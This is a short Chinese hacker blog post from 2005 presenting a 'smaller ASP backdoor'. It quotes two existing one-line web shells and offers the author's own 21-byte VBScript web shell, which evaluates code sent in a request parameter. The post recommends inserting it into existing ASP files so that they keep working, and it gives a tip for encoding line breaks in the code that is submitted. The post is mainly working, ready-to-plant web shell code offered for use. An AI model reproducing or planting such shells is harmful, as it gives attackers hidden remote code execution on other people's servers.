更小的asp后门

    上回在一个论坛看到有人问服务端限制提交数据为16字节能不能写个webshell到改为asp格式的数据库，所以就想了想，发现了这个更小的后门 :-)

    你一定见过冰狐浪子的asp后门吧，呵呵，他的后门号称“最小的asp后门”，所以偶的这个只好是“更小的”了。

    废话少说，先看看他的代码：

javascript下的<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT>

vbscript下的<%Execute Request("?")%>

    第一个太长不说了；第二个在实际使用中由于execute函数的参数为空时会产生错误必须加上容错或者条件判断句所以会多出很多字节出来。

    那天看VBScript参考手册时发现原来vbs里也有eval函数，其作用是“计算一个表达式的值并返回结果”。看它的描述好像是不会执行代码的。“尽信书不如无书”，所以不管它试试再说。

    新建一个asp文件内容为“<%eval("response.write(""lake2"")")%>”，这是调用eval函数但忽略其返回值（实际上这里返回值为空）。执行之，哈哈，response.write语句执行了！原来eval像execute一样可以执行一个或多个指定的语句。但是eval函数参数为空时并不会出错，所以你可以放心的把“<%eval request("X")%>”插入到asp文件中而不必担心破坏原有asp文件的执行。

    剩下的事就是用HTML写个客户端，简单得等同于体力活了。不过需要注意提交的代码里的回车换行符用要&vbcrlf&替换掉——eval可是不认回车和冒号分隔符的哦，这也是它与execute的不同之处。

    虽然这个后门更小些，不过一般情况下execute已经足够了；这个后门加上asp标识符共有21个字节，不知道是不是asp后门的极限了呢？

    2005-3-8